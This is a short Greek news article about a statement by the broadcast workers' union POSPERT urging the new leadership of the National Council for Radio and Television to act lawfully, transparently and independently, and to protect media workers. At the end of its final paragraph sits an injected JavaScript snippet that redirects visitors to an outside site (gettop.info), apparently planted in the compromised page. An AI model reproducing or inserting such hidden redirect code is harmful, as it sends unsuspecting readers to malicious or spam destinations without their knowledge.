ΠΟΣΠΕΡΤ: Το ΕΣΡ να επιτελέσει το καθήκον του με νομιμότητα και με διαφάνεια

0
5

 

H ΠΟΣΠΕΡΤ καλεί τη νέα διοίκηση του Εθνικού Συμβουλίου Ραδιοτηλεόρασης να επιτελέσει το καθήκον του με βάση τις απαιτήσεις της κοινωνίας και των εργαζομένων στα ΜΜΕ, με διαφάνεια, νομιμότητα, ισονομία και αμεροληψία.

Σε ανακοίνωσή της δηλώνει ότι ελπίζει στην ανεξαρτησία της αρχής και τονίζει ότι τα μέλη του ΕΣΡ πρέπει να λειτουργήσουν ελεύθερα, χωρίς πατρωνίες και επιβουλές, ώστε να αποδώσουν με βάση το Σύνταγμα, νομιμότητα στα ΜΜΕ, «έστω και μετά από τόσα χρόνια απραξίας».

Επίσης, η ΠΟΣΠΕΡΤ σημειώνει ότι οι αρμοδιότητες του ΕΣΡ δεν θα είναι μόνο το πολύ σημαντικό θέμα των αδειών, αλλά γενικότερα η εύρυθμη λειτουργία του ραδιοτηλεοπτικού τοπίου, λαμβάνοντας υπόψιν πρώτα και κύρια τους εργαζομένους.

Η ανακοίνωση της ΠΟΣΠΕΡΤ υπογραμμίζει ότι «δεν θα γίνει ανεκτή καμία απόφαση που θα επαναφέρει ή εντείνει τις συνθήκες ανθρωποφαγίας και ανεργίας του προηγούμενου διαστήματος» και σημειώνει ότι το ΕΣΡ μπορεί να διερευνήσει τις δυνατότητες αδειοδότησης ραδιοτηλεοπτικού προϊόντος και προς αυτοδιαχειριζόμενα σχήματα ή κοινωνικούς φορείς που μπορούν να παράξουν έργο πολιτισμού και ψυχαγωγίας με κοινωνικό όφελος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here